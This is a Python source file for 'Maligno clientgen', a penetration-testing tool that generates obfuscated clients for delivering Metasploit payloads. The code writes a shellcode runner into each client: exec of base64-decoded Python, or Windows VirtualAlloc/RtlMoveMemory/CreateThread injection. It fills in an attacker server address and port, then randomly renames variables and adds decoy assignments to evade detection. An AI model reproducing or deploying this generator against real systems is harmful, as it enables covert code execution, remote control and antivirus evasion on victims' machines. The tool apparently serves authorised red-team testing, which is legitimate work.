#!/usr/bin/python

################################################################
#                                                              #
# Maligno clientgen                                            #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2015 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################



import os, getopt, sys, string, random, urllib, libs.malcfg, libs.malout
import xml.etree.ElementTree as ET

__version__ = "1.5"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


def header():
    os.system("clear")

    print ""
    print " ================================================================= "
    print "|  Maligno clientgen v{0}: Maligno client generator \t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""


def help():
    header()
    print """
   Usage: python clientgen.py [mandatory args]

   Mandatory args:
       -f  file         ...Maligno server config file

   Example:
       python clientgen.py -f server_config.xml
    """
    sys.exit(0) 


def get_client_template(template_file):
    try:
        fr = open(template_file, 'r')
        content = fr.read().splitlines()
        fr.close()

    except IOError:
        libs.malout.print_error("Could not find %s." % template_file)
        sys.exit()

    return content

 
def generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload):
    client_code = []
    for template_line in client_template:
        if template_line == "<ENCODING>":
            code_line = "encoding = \"" + profile_network_config["encoding"] + "\""
            code_line += "\n"
            code_line += "encoding_rounds = " + profile_network_config["rounds"]

        elif template_line == "<RESPPREFIX>":
            resp_prefix = ""
            try: 
                resp_prefix = urllib.unquote(profile_response_config["prefix"])

            except KeyError:
                resp_prefix = ""

            code_line = "resp_prefix = \"" + resp_prefix + "\""

        elif template_line == "<RESPSUFFIX>":
            resp_suffix = ""
            try: 
                resp_suffix = urllib.unquote(profile_response_config["suffix"])

            except KeyError:
                resp_suffix = ""

            code_line = "resp_suffix = \"" + resp_suffix + "\""

        elif template_line == "<SECRET>":
            code_line = "secret = \"" + profile_network_config["secret"] + "\""

        elif template_line == "<REQ>":
            code_line = "req_page = \"" + profile_request_config["page"] + "\""
            code_line += "\n"
            code_line += "req_param = \"" + profile_request_config["parameter"] + "\""

        elif template_line == "<URLPREFIX>":
            url_prefix = ""
            try: 
                url_prefix = urllib.unquote(profile_request_config["prefix"])

            except KeyError:
                url_prefix = ""

            code_line = "url_prefix = \"" + url_prefix + "\""

        elif template_line == "<URLSUFFIX>":
            url_suffix = ""
            try: 
                url_suffix = urllib.unquote(profile_request_config["suffix"])

            except KeyError:
                url_suffix = ""

            code_line = "url_suffix = \"" + url_suffix + "\""

        elif template_line == "<PAYLOAD>":
            code_line = "payload_id = " + str(msfpayload["id"])
            code_line += "\n"
            code_line += "max_nap_time = " + profile_client_config["maxnaptime"]

        elif template_line == "<PROTOCOL>":
            if profile_response_config["protocol"].upper() == "HTTP/1.0":
                code_line = "http_10 = True"
            else:
                code_line = "http_10 = False"

        elif template_line == "<SSL>":
            if server_config["ssl"].upper() == "TRUE":
                code_line = "ssl = True"
            else:
                code_line = "ssl = False"

        elif template_line == "<SRV>":
            code_line = "server_addr = \"" + server_config["addr"] + "\""
            code_line += "\n"
            code_line += "server_port = \"" + server_config["port"] + "\""

        elif template_line == "<HEADERS>":
            code_line = "http_headers = { "
            if profile_client_header_config:
                    for header in profile_client_header_config:
                        if header:
                            code_line += "\"%s\" : \"%s\", " % (str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())

                        else:
                            print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"

            code_line += "\"User-Agent\" : \"%s\" }" % (profile_client_config["useragent"])

        elif template_line == "<GETCAUGHT>":
            code_line = "get_caught = " + str(profile_network_config["getcaught"])
            code_line += "\n"
            code_line += "req_delay = " + str(profile_network_config["reqdelay"])

        elif template_line == "        <EXECUTION>":
            if msfpayload["payload"].find("python") > -1:
                code_line = "        exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](shellcode)))"
            else:
                code_line = """        shellcode = shellcode.decode("string_escape")
        shellcode = bytearray(shellcode)
        ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
        ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(shellcode)))
        bff = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
        ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(shellcode)))
        thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
        ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))"""

        elif template_line.startswith("#"):
            continue

        else:
            code_line = template_line

        client_code.append(code_line)

    return client_code


def generate_name(size=10, chars=string.ascii_uppercase +  string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))


def generate_extension():
    return random.choice(["aspx", "php", "html", "htm", "jsp", "nsf"])


def generate_encoding_type():
    return random.choice(["base64", "hex", "ascii", "plain"])


def obfuscate_client_code(client_code):

    table = { 
            "encoding" : generate_name(random.randint(5,20)), "encoding_rounds" : generate_name(random.randint(5,20)),
            "secret" : generate_name(random.randint(5,20)), "req_page" : generate_name(random.randint(5,20)),
            "req_param" : generate_name(random.randint(5,20)), "url_prefix" : generate_name(random.randint(5,20)),
            "url_suffix" : generate_name(random.randint(5,20)), "req_path" : generate_name(random.randint(5,20)),
            "ctext" : generate_name(random.randint(5,20)), "resp_prefix" : generate_name(random.randint(5,20)),
            "resp_suffix" : generate_name(random.randint(5,20)), "http_10" : generate_name(random.randint(5,20)),
            "payload_id" : generate_name(random.randint(5,20)), "ssl" : generate_name(random.randint(5,20)), 
            "server_addr" : generate_name(random.randint(5,20)), "server_port" : generate_name(random.randint(5,20)),
            "http_headers" : generate_name(random.randint(5,20)), "cipher" : generate_name(random.randint(5,20)),
            "header_key" : generate_name(random.randint(5,20)), "header_value" : generate_name(random.randint(5,20)),
            "plaintext" : generate_name(random.randint(5,20)), "padding_char" : generate_name(random.randint(5,20)),
            "http_conn" : generate_name(random.randint(5,20)), "http_resp" : generate_name(random.randint(5,20)),
            "shellcode" : generate_name(random.randint(5,20)), "unpack_data" : generate_name(random.randint(5,20)),
            "ptr" : generate_name(random.randint(5,20)), "bff" : generate_name(random.randint(5,20)),
            "thread" : generate_name(random.randint(5,20)), "__version__" : generate_name(random.randint(5,20)),
            "total" : generate_name(random.randint(5,20)), "iteration" : generate_name(random.randint(5,20)),
            "has_slept" : generate_name(random.randint(5,20)), "max_nap_time" : generate_name(random.randint(5,20)),
            "get_caught" : generate_name(random.randint(5,20)), "num_reqs" : generate_name(random.randint(5,20)),
            "req_delay" : generate_name(random.randint(5,20)), "nap_time" : generate_name(random.randint(5,20))
            }

    obfuscated_code = []
    for x in xrange(0, random.randint(5,20)):
        obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))

    reached = False
    for line in client_code:
        if line.startswith("def"):
            reached = True

        if not reached:
            for x in xrange(0, random.randint(0,10)):
                n = random.randint(0, 10000000) 
                if n % 11 == 7:
                    obfuscated_code.append("%s = \"%s.%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(5,10)).lower(), 
                                                               generate_extension().lower()))
                elif n % 11 == 6:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(1, 10))))

                elif n % 11 == 5:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(generate_name(32, string.hexdigits).lower())))

                elif n % 11 == 4:
                    obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))

                elif n % 11 == 3:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(random.randint(0,1024))))

                elif n % 11 == 2:
                    if n % 2:
                        obfuscated_code.append("%s = True" % (generate_name(random.randint(5,20))))
                    else:
                        obfuscated_code.append("%s = False" % (generate_name(random.randint(5,20))))

                elif n % 11 == 1:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_encoding_type().lower()))

                else:
                    obfuscated_code.append("%s = \"%s.%s.%s.%s\"" % 
                    (generate_name(random.randint(5,20)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1))))

        for key, value in table.iteritems():
            line = line.replace(key, value, 999)

        if len(line) > 0:
            obfuscated_code.append(line)

    return obfuscated_code


def generate_client_file(client_code, output_file):
    try:
        fw = open(output_file, 'w')
        fw.write("#!/usr/bin/python\n")

        for line in client_code:
            fw.write(line + "\n")

        fw.close()
        libs.malout.print_ok("Client file \"%s\" successfully written!\n" % output_file)
    except IOError:
        libs.malout.print_error("Could not save client code in %s.\n" %  output_file)

    return


if __name__ == '__main__':

    try:
        options, args = getopt.getopt(sys.argv[1:], "f:", ["file="])

    except getopt.GetoptError, err:
        header()
        libs.malout.print_error("ERROR: %s.\n" % str(err))
        sys.exit(1)

    if not options:
        help()

    config_file = None

    for opt, arg in options:
        if opt in ("-f"):
            config_file = arg    

    if not config_file:
        header()
        libs.malout.print_error("ERROR: You must provide all mandatory arguments.\n")
        sys.exit(1)


    header()

    libs.malout.print_info("Reading server configuration file...")
    server_config = libs.malcfg.get_server_config(config_file)
    payload_config = libs.malcfg.get_payload_config(config_file)

    libs.malout.print_info("Reading profile...")
    profile_request_config = libs.malcfg.get_profile_request_config(server_config["profile"])
    profile_response_config = libs.malcfg.get_profile_response_config(server_config["profile"])
    profile_network_config = libs.malcfg.get_profile_network_config(server_config["profile"])
    profile_client_config = libs.malcfg.get_profile_client_config(server_config["profile"])
    profile_client_header_config = libs.malcfg.get_profile_client_header_config(server_config["profile"])

    output_folder = "./clients"
    if not os.path.exists(output_folder):
        os.makedirs(output_folder)

    index = 0
    for msfpayload in payload_config:
        index += 1
        print ""
        libs.malout.print_info("Generating client: %s of %s..." % (index, len(payload_config)))
        libs.malout.print_info("Reading client template...")
        client_template = get_client_template("maligno_client.template")

        libs.malout.print_info("Generating client code...")
        client_code = generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload)

        libs.malout.print_info("Obfuscating client code...")
        obfuscated_client_code = obfuscate_client_code(client_code)

        libs.malout.print_info("Writing client code to file...\n")
        generate_client_file(obfuscated_client_code, output_folder + "/" + msfpayload["id"] + "_" + msfpayload["payload"].split("/")[0] + "_" + msfpayload["payload"].split("/")[-1] + ".py")

    sys.exit()